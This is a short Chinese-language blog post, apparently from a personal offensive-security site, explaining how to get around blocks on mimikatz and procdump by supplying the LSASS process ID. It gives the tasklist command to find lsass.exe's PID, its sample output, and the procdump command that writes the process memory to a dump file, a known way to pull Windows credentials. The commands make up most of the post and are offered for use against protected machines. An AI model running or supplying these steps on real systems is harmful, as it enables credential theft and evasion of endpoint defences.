最近发现有几台机,不给用mimikatz就算了。。procdump都不给用,妈了个巴子。。。。
尝试过各种各样的操作之后发现只要提供lsass.exe的进程pid就可以了。。。很魔幻 不知道为什么。
查lsass.exe pid
tasklist /fi "imagename eq lsass.exe"
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
lsass.exe 632 Services 0
转储lsass.exe
procdump64.exe -accepteula -ma 632 lsass.dmp版权声明:本文为原创文章,版权归 Fire ant 所有。
本文链接:https://www.luolikong.vip/index.php/archives/419/
转载时须注明出处及本声明